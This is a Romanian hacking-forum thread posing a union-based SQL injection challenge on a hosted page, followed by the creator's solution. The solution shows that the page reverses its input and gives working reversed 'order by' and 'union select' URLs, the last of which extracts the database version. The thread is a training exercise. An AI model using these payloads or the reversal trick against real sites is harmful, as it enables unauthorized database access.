Jump to content
dancezar

Strange Sql injection challenge

Recommended Posts

  • Active Members
Posted (edited)

Target:http://comyuycs.comli.com/sqli2.php?id=1

Task:-Folositi union based sql injection

-Afisati nickul vostru impreuna cu versiunea

-Nu dati alte hinturi pastrati solutia pentru voi

Proof:

sqli_me.png

http://s9.postimg.org/y8j0cp5wf/sqli_me.png

Hint:VkZjeFNrMVZOVVZhZWxKYVlXdFZlbFJzVWtKT1JuQjBWMVJHWVZaRlZUQlhWbEpEWVVVMGVWTlVSazVTUmxWM1YyeFNRazFzY0hGWFZEQTk=

Solvers:

-Bitmap

-askwrite

-Bit-ul

-wHoIS

Edited by danyweb09
  • Active Members
Posted
Easy level, thanks for challenge, next challenge.

ok friend send me the syntax and i post you on solvers list.Next challenge for you? First this https://rstforums.com/forum/75984-easy-sql-injection-challenge.rst and then?:)).....this https://rstforums.com/forum/76012-hard-sql-injection.rst if you want https://rstforums.com/forum/75620-sqli-challenge.rst try this alsow https://rstforums.com/forum/75528-sqli-challenge.rst good luck

Posted
ok friend send me the syntax and i post you on solvers list.Next challenge for you? First this https://rstforums.com/forum/75984-easy-sql-injection-challenge.rst and then?:)).....this https://rstforums.com/forum/76012-hard-sql-injection.rst if you want https://rstforums.com/forum/75620-sqli-challenge.rst try this alsow https://rstforums.com/forum/75528-sqli-challenge.rst good luck

All easy levels. Thanks for the challenges.

I'm waiting for the next challenges.

Posted

d291a6c977386d735a858c6652f327fc.png

Foarte, foarte bine gandit challenge-ul =d>

Nu pot sa trimit PM cu sintaxa, dar pana la urma nu acel 'Hall of Fame' conteaza asa de mult, ci, challenge-ul in sine, ceea ce am invatat rezolvand-ul, cel care l-a creat sau a vrut sa il faca public.

Si indiferent ce s-a intamplat eu sper sa ne mai auzim pe forum.

  • Active Members
Posted (edited)

Bravo baieti :) maine am sa inchid challenge-ul si am sa postez si secretul:))

Poate mai rezolva cineva pana maine

Edit:

Challenge Closed

Felicitari tuturor participantilor

-Bitmap

-askwrite

-Bit-ul

-wHoIS

Solutia a fost foarte simpla si se afla in HINT si anume source code.

Daca puneati dupa id=1 order by 1+--+ si va uitati in sursa veti obtine o eroarea ca asta "ion for the right syntax to use near 'yb redro 1' at line 1-" . "yb redro 1" este inversat cea ce inseamna ca orice introduceti dupa id v-a fi rasturnat daca bagati dupa id "mere" in sursa v-a aparea eroarea si va v-a spune "erem".Cum facem sa inversam acest proces? foarte simplu daca noi vom introduce deja un cuvant invers citit de la dreapta la stanga functia strrev din php v-a inversa acest cuvant si il v-a aduce la forma lui normala.

Cu astea fiind spune pentru a numera coloanele folosim:http://comyuycs.comli.com/sqli2.php?id=1%20yb%20redro%201 dupa ce functia v-a inversa cuvantul vom obtine order by 1 iar daca schimbam id=4 yb redro 1 vom obtine eroarea Unknown column '4' deci is 3 coloane.

Apoi facem union pe 3 coloane in felul umator http://comyuycs.comli.com/sqli2.php?id=3,2,1%20tceles%20noinu%200 si vom obtine coloana vurnerabila 2.Si vom folosi acelasi procedeu pentru a scoate versiunea http://comyuycs.comli.com/sqli2.php?id=3,noisrev@@,1%20tceles%20noinu%200

Edited by danyweb09

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...